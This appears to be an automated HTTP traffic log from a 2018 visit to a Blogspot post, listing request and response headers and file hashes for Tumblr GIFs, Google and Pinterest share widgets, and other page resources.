Cache-Control: private, max-age=1800, stale-while-revalidate=1800
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Strict-Transport-Security: max-age=31536000
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=136=tImELumT9TLQAGNTas2jYikHAa7rNgGQfTJ01LwSIi0lUXCsDvTqSdzv3frrdlbVqy8kBoCU1qTSm-Gyry7X5bYaEuOapE4vqD9DCapRfxgWwuDt304InerSaBZRsslw;Domain=.google.com;Path=/;Expires=Sat, 09-Feb-2019 23:48:22 GMT;HttpOnly
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   16813
Md5:    f13151792c4c43f16ab9719f188d5a63
Sha1:   afc64d4976099c9f773a957b7e32cddc9a8bdee2
Sha256: 33d471c87439baf607ffb389db1d3ff4fb045f5a15cd51e8d1636223c76073e7
                                        
                                            GET /tumblr_m918scUpjy1rox6k0o1_500.gif HTTP/1.1 
Host: 25.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         66.6.33.21
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: openresty
Date: Fri, 10 Aug 2018 23:48:22 GMT
Content-Length: 182
Connection: keep-alive
Location: http://78.media.tumblr.com/tumblr_m918scUpjy1rox6k0o1_500.gif


--- Additional Info ---
Magic:  HTML document text
Size:   182
Md5:    b9d44ae5ca75a352070be23a6e9c70f6
Sha1:   a3aa893ef50506ec0f1fdf60ccfbf5e48f142e81
Sha256: e3631af1efa5be63f728619833a5a8a23a1f72ca40d6f6b6c71d80bca51975c0
                                        
                                            GET /_/scs/apps-static/_/js/k=oz.gapi.en_US.A0tZbbhuWGM.O/m=plusone/rt=j/sv=1/d=1/ed=1/am=wQ/rs=AGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ/cb=gapi.loaded_0 HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html
Cookie: NID=136=tImELumT9TLQAGNTas2jYikHAa7rNgGQfTJ01LwSIi0lUXCsDvTqSdzv3frrdlbVqy8kBoCU1qTSm-Gyry7X5bYaEuOapE4vqD9DCapRfxgWwuDt304InerSaBZRsslw

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 46715
Date: Thu, 09 Aug 2018 18:05:06 GMT
Expires: Fri, 09 Aug 2019 18:05:06 GMT
Last-Modified: Wed, 08 Aug 2018 21:38:04 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, immutable, max-age=31536000
Age: 106996
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   46715
Md5:    a027f37252f1c5a59916b618f8d19e1b
Sha1:   8f16a7d8f673642120ec6cb6647f1453d263d7b4
Sha256: 333eea5aa9365215a44a95a9f52f0103ea890aa86a48741a904a72d95b77dcbf
                                        
                                            GET /tumblr_m8pza58bxR1rox6k0o1_500.gif HTTP/1.1 
Host: 25.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         66.6.33.21
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: openresty
Date: Fri, 10 Aug 2018 23:48:22 GMT
Content-Length: 182
Connection: keep-alive
Location: http://78.media.tumblr.com/tumblr_m8pza58bxR1rox6k0o1_500.gif


--- Additional Info ---
Magic:  HTML document text
Size:   182
Md5:    b9d44ae5ca75a352070be23a6e9c70f6
Sha1:   a3aa893ef50506ec0f1fdf60ccfbf5e48f142e81
Sha256: e3631af1efa5be63f728619833a5a8a23a1f72ca40d6f6b6c71d80bca51975c0
                                        
                                            GET /tumblr_m9itnkr1zM1qmsxbpo1_500.gif HTTP/1.1 
Host: 25.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         66.6.33.21
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: openresty
Date: Fri, 10 Aug 2018 23:48:22 GMT
Content-Length: 182
Connection: keep-alive
Location: http://78.media.tumblr.com/tumblr_m9itnkr1zM1qmsxbpo1_500.gif


--- Additional Info ---
Magic:  HTML document text
Size:   182
Md5:    b9d44ae5ca75a352070be23a6e9c70f6
Sha1:   a3aa893ef50506ec0f1fdf60ccfbf5e48f142e81
Sha256: e3631af1efa5be63f728619833a5a8a23a1f72ca40d6f6b6c71d80bca51975c0
                                        
                                            GET /tumblr_m9dqkdkG0E1roqvf0o1_500.gif HTTP/1.1 
Host: 25.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         66.6.33.21
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: openresty
Date: Fri, 10 Aug 2018 23:48:22 GMT
Content-Length: 182
Connection: keep-alive
Location: http://78.media.tumblr.com/tumblr_m9dqkdkG0E1roqvf0o1_500.gif


--- Additional Info ---
Magic:  HTML document text
Size:   182
Md5:    b9d44ae5ca75a352070be23a6e9c70f6
Sha1:   a3aa893ef50506ec0f1fdf60ccfbf5e48f142e81
Sha256: e3631af1efa5be63f728619833a5a8a23a1f72ca40d6f6b6c71d80bca51975c0
                                        
                                            GET /tumblr_m5i4j7vYKM1ry86iwo1_r1_500.gif HTTP/1.1 
Host: 25.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         66.6.33.21
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: openresty
Date: Fri, 10 Aug 2018 23:48:22 GMT
Content-Length: 182
Connection: keep-alive
Location: http://78.media.tumblr.com/tumblr_m5i4j7vYKM1ry86iwo1_r1_500.gif


--- Additional Info ---
Magic:  HTML document text
Size:   182
Md5:    b9d44ae5ca75a352070be23a6e9c70f6
Sha1:   a3aa893ef50506ec0f1fdf60ccfbf5e48f142e81
Sha256: e3631af1efa5be63f728619833a5a8a23a1f72ca40d6f6b6c71d80bca51975c0
                                        
                                            GET /_/scs/apps-static/_/js/k=oz.gapi.en_US.A0tZbbhuWGM.O/m=auth/exm=plusone/rt=j/sv=1/d=1/ed=1/am=wQ/rs=AGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ/cb=gapi.loaded_1 HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html
Cookie: NID=136=tImELumT9TLQAGNTas2jYikHAa7rNgGQfTJ01LwSIi0lUXCsDvTqSdzv3frrdlbVqy8kBoCU1qTSm-Gyry7X5bYaEuOapE4vqD9DCapRfxgWwuDt304InerSaBZRsslw

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 35326
Date: Thu, 09 Aug 2018 18:08:38 GMT
Expires: Fri, 09 Aug 2019 18:08:38 GMT
Last-Modified: Wed, 08 Aug 2018 21:38:04 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, immutable, max-age=31536000
Age: 106784
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   35326
Md5:    bc00982d6eb53171d7cc05e1a20fe228
Sha1:   25c578e7c5ff697d4e25c08ac882facedce2bcc2
Sha256: 761fe220448c648a192ad35a94c59b73d674b7fedb3476b0a1cf7ca13884d4c1
                                        
                                            GET /v1/urls/count.json?url=http%3A%2F%2Fefrumuseti.blogspot.com%2F2012%2F05%2Fblog-post_35.html&callback=PIN_1533944902569.f.callback[0] HTTP/1.1 
Host: widgets.pinterest.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         151.101.192.84
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Access-Control-Allow-Origin: *
Cache-Control: must-revalidate, max-age=887
Expires: Sat, 11 Aug 2018 00:03:22 GMT
X-Content-Type-Options: nosniff
x-envoy-upstream-service-time: 4
x-pinterest-host: widgets.pinterest.com
x-pinterest-rid: 184746099283
Transfer-Encoding: chunked
Date: Fri, 10 Aug 2018 23:48:23 GMT
Age: 0
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   109
Md5:    ee19b58f54ed337dc357a2fee654a31b
Sha1:   430a7d47bd41f60dc47328fbc69df96759759591
Sha256: 8921364a335a3225f9dbd1916123e3a1e3c43db30ccaedca57d925cc9235c03d
                                        
                                            GET /v1/urls/count.json?url=http%3A%2F%2Fefrumuseti.blogspot.com%2F2012%2F05%2Fblog-post_35.html&callback=PIN_1533944902569.f.callback[1] HTTP/1.1 
Host: widgets.pinterest.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         151.101.192.84
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Access-Control-Allow-Origin: *
Cache-Control: must-revalidate, max-age=887
Expires: Sat, 11 Aug 2018 00:03:22 GMT
X-Content-Type-Options: nosniff
x-envoy-upstream-service-time: 4
x-pinterest-host: widgets.pinterest.com
x-pinterest-rid: 184746099283
Transfer-Encoding: chunked
Date: Fri, 10 Aug 2018 23:48:23 GMT
Age: 0
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   109
Md5:    44db3da04a1e9ba4de0f8efac18236ca
Sha1:   feb1181953e11c2cd3a171670e5e07c4bf94c271
Sha256: a8847ed8e9f63bbca18e73b44d5b250b23f9500ceef90bd2b91f0a15d5ed535f
                                        
                                            GET /tumblr_m8hm9hTOYt1qd2dcwo1_500.gif HTTP/1.1 
Host: 24.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         66.6.33.149
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: openresty
Date: Fri, 10 Aug 2018 23:48:23 GMT
Content-Length: 182
Connection: keep-alive
Location: http://78.media.tumblr.com/tumblr_m8hm9hTOYt1qd2dcwo1_500.gif


--- Additional Info ---
Magic:  HTML document text
Size:   182
Md5:    b9d44ae5ca75a352070be23a6e9c70f6
Sha1:   a3aa893ef50506ec0f1fdf60ccfbf5e48f142e81
Sha256: e3631af1efa5be63f728619833a5a8a23a1f72ca40d6f6b6c71d80bca51975c0
                                        
                                            GET /se/0/_/+1/fastbutton?usegapi=1&size=medium&annotation=bubble&origin=http%3A%2F%2Fefrumuseti.blogspot.com&url=http%3A%2F%2Fefrumuseti.blogspot.com%2F2012%2F05%2Fblog-post_35.html&gsrc=3p&ic=1&jsh=m%3B%2F_%2Fscs%2Fapps-static%2F_%2Fjs%2Fk%3Doz.gapi.en_US.A0tZbbhuWGM.O%2Fam%3DwQ%2Frt%3Dj%2Fd%3D1%2Frs%3DAGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ%2Fm%3D__features__ HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html
Cookie: NID=136=tImELumT9TLQAGNTas2jYikHAa7rNgGQfTJ01LwSIi0lUXCsDvTqSdzv3frrdlbVqy8kBoCU1qTSm-Gyry7X5bYaEuOapE4vqD9DCapRfxgWwuDt304InerSaBZRsslw

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
x-ua-compatible: IE=edge, chrome=1
Vary: Accept-Encoding
Timing-Allow-Origin: *
Expires: Fri, 10 Aug 2018 23:48:23 GMT
Date: Fri, 10 Aug 2018 23:48:23 GMT
Cache-Control: private, max-age=3600
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   3914
Md5:    04fde86dd32e372718bc8fee01d0a1e8
Sha1:   0cd75ae2cdd678765fa1a0ac82fb43f91ffa9ba0
Sha256: 247cb1678aecdefc00df0d35d98a540c1818423a3a154f381d0135e412680d79
                                        
                                            GET /_/scs/apps-static/_/js/k=oz.gapi.en_US.A0tZbbhuWGM.O/am=wQ/rt=j/d=1/rs=AGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ/m=googleapis_client,gapi_iframes_style_common,gapi_iframes_iframer HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://apis.google.com/se/0/_/+1/fastbutton?usegapi=1&size=medium&annotation=bubble&origin=http%3A%2F%2Fefrumuseti.blogspot.com&url=http%3A%2F%2Fefrumuseti.blogspot.com%2F2012%2F05%2Fblog-post_35.html&gsrc=3p&ic=1&jsh=m%3B%2F_%2Fscs%2Fapps-static%2F_%2Fjs%2Fk%3Doz.gapi.en_US.A0tZbbhuWGM.O%2Fam%3DwQ%2Frt%3Dj%2Fd%3D1%2Frs%3DAGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ%2Fm%3D__features__
Cookie: NID=136=tImELumT9TLQAGNTas2jYikHAa7rNgGQfTJ01LwSIi0lUXCsDvTqSdzv3frrdlbVqy8kBoCU1qTSm-Gyry7X5bYaEuOapE4vqD9DCapRfxgWwuDt304InerSaBZRsslw

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 46105
Date: Thu, 09 Aug 2018 17:52:51 GMT
Expires: Fri, 09 Aug 2019 17:52:51 GMT
Last-Modified: Wed, 08 Aug 2018 21:38:04 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, immutable, max-age=31536000
Age: 107732
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   46105
Md5:    477b27cfdfd4649946b0c2b9893bf456
Sha1:   13f75d03ffac4eed5dfdae3994e3ff7141f492d1
Sha256: ff83df6db956aa96cba4a8e72a2a816eb2ec365e0609f93f060c79c9f8628625
                                        
                                            GET /feeds/posts/default?max-results=6&orderby=published&alt=json-in-script&callback=showrecentposts1 HTTP/1.1 
Host: efrumuseti.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.1
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"63aff54ad05a5ec5ccfe352c1d8cb5e4ebc484d231ae91867e673b2944d1ff8f"
Date: Fri, 10 Aug 2018 23:48:23 GMT
Server: blogger-renderd
Vary: Accept-Encoding
Expires: Tue, 07 Aug 2018 18:24:57 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Tue, 31 Jul 2018 18:38:32 GMT
Content-Length: 1614
X-Frame-Options: SAMEORIGIN
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Age: 0


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   1614
Md5:    29e2914b03ee4710b5cb0f1fa22ce528
Sha1:   e6b0010bba338a3cd2ceb731d1c930e0fc033e40
Sha256: c08299b5c8540d2978d3b0aaaf716808d893a8143e68a6de4a0b4646028968f6
                                        
                                            GET /tumblr_m1q5oflBvf1r2ub2xo1_500.gif HTTP/1.1 
Host: 78.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         87.248.118.24
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Fri, 10 Aug 2018 23:48:22 GMT
Content-Length: 719134
Server: ATS
Last-Modified: Sun, 26 Feb 2017 00:00:00 GMT
Etag: "1aca6fae182d6f55eb1e4cb2a437a7f4-1488067200-42e44d9"
x-frames: 17
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 600
Cache-Control: max-age=604800
Age: 0
Via: http/1.1 sc3.ycpi.dcc.yahoo.com (ApacheTrafficServer [cSsNfU]), https/1.1 e12.ycpi.deb.yahoo.com (ApacheTrafficServer [cMsSfW]), http/1.1 e13.ycpi.deb.yahoo.com (ApacheTrafficServer [c sSf ])
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 499 x 286
Size:   719134
Md5:    1aca6fae182d6f55eb1e4cb2a437a7f4
Sha1:   b2a4aea4b82b466e1f18b05540c4b40b008b809e
Sha256: 90489b525934b2cd4c2ac7b7092d90ca15087f35d2e5b2aa1b97b5d06c07cda2
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 10 Aug 2018 23:48:24 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    eaa2a297cbc883253df03133f2a09798
Sha1:   fca15303143f83219cbd9e206faa965bdf928332
Sha256: 54223f39ca57b5c00e789aebfb0bcb5a16ac6e2a82cdd11fa5219b767e5502eb
                                        
                                            GET /-b9OEmVdL6Q4/URA_BL7OXWI/AAAAAAAAB2k/c9exOQaNu2U/s1600/slider_item_active.png HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.1
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Etag: "v769"
Expires: Thu, 09 Aug 2018 02:04:45 GMT
Content-Disposition: inline;filename="slider_item_active.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Fri, 10 Aug 2018 23:40:01 GMT
Server: fife
Content-Length: 428
X-XSS-Protection: 1; mode=block
Age: 503
Cache-Control: public, max-age=86400, no-transform


--- Additional Info ---
Magic:  PNG image, 10 x 10, 8-bit/color RGBA, non-interlaced
Size:   428
Md5:    fb81214b9d658f79a14c4d577b8cb7cc
Sha1:   e88bc1d57b4af2cdcbf96531841a5f1f70f479ea
Sha256: 198ae9646e3935f553b49862adf5104728fe67319da4a019022ccac1f29e454e
                                        
                                            GET /tumblr_m918scUpjy1rox6k0o1_500.gif HTTP/1.1 
Host: 78.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         87.248.118.24
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Sat, 04 Aug 2018 20:27:19 GMT
Content-Length: 775594
Server: ATS
Last-Modified: Sun, 26 Feb 2017 00:00:00 GMT
x-frames: 12
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 600
Cache-Control: max-age=604800
Etag: "c23c0727851e678ad15397e5d65b2c26-1488067200-42e44d9"
Age: 530463
Via: http/1.1 sc7.ycpi.dcc.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 sc16.ycpi.dcc.yahoo.com (ApacheTrafficServer [cMsSf ]), http/1.1 e8.ycpi.deb.yahoo.com (ApacheTrafficServer [cHs f ]), http/1.1 e14.ycpi.deb.yahoo.com (ApacheTrafficServer [c sSf ])
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 485 x 314
Size:   775594
Md5:    c23c0727851e678ad15397e5d65b2c26
Sha1:   8826edfc7c65e4302a1265baa08bbc5f90797e5a
Sha256: 169cfb2b2c4fffc3fbfc34c8126831bb49514b652fadb4a7bd05d2cc3044e9a7
                                        
                                            GET /o/oauth2/postmessageRelay?parent=http%3A%2F%2Fefrumuseti.blogspot.com&jsh=m%3B%2F_%2Fscs%2Fapps-static%2F_%2Fjs%2Fk%3Doz.gapi.en_US.A0tZbbhuWGM.O%2Fam%3DwQ%2Frt%3Dj%2Fd%3D1%2Frs%3DAGLTcCNG73IWE-GDAUeNK0mN2s9b1KDujQ%2Fm%3D__features__ HTTP/1.1 
Host: accounts.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html
Cookie: NID=136=tImELumT9TLQAGNTas2jYikHAa7rNgGQfTJ01LwSIi0lUXCsDvTqSdzv3frrdlbVqy8kBoCU1qTSm-Gyry7X5bYaEuOapE4vqD9DCapRfxgWwuDt304InerSaBZRsslw

                                         
                                         216.58.211.13
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 10 Aug 2018 23:48:24 GMT
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   362
Md5:    b30c8f00f2b252152431643f1d87be33
Sha1:   13ae847d8c369328efb2d72df3abb63c0d6cd93e
Sha256: 8100c3e472da15f0a44466991266e6d740f33c5695e18e5704c2ea7ce8aee99f
                                        
                                            GET /tumblr_m8pza58bxR1rox6k0o1_500.gif HTTP/1.1 
Host: 78.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         87.248.118.24
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 09 Aug 2018 04:30:45 GMT
Content-Length: 1005589
Server: ATS
Last-Modified: Sun, 26 Feb 2017 00:00:00 GMT
Etag: "7c2c59a87bd8444de4d42ea12f40b95f-1488067200-42e44d9"
x-frames: 28
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 600
Cache-Control: max-age=604800
Age: 155858
